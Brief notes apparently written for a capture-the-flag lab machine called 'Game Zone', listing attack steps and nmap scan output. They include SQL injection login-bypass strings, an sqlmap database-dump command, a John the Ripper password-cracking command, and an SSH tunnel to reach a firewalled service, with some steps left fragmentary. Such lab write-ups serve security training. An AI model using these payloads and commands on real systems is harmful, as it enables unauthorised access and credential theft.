Learn to hack into this machine. Understand how to use SQLMap, crack some passwords, reveal services using a reverse SSH tunnel and escalate your privileges to root!
steps
- scan ports
- try sql injection for input field
adminand' or 1=1 -- -' or 1=1 -- -and blank- capture search request in burpsuit
- save request as text file
- pass into sqlmap
sqlmap -r <request.txt> --dbms=mysql --dump
- wait for enumeration and find passwords
- use jtr to crack password
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256
- look at sockets running on target
ss -tulpn
- port 10000 blocked by firewall
- use ssh tunnel to expose service
ssh -L 10000:localhost:10000 <username>@<ip>
- access exposed service using webbrowser
localhost:10000 - search for exploit
- append to url
- append file location
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 61:ea:89:f1:d4:a7:dc:a5:50:f7:6d:89:c3:af:0b:03 (RSA)
| 256 b3:7d:72:46:1e:d3:41:b6:6a:91:15:16:c9:4a:a5:fa (ECDSA)
|_ 256 53:67:09:dc:ff:fb:3a:3e:fb:fe:cf:d8:6d:41:27:ab (EdDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Game Zone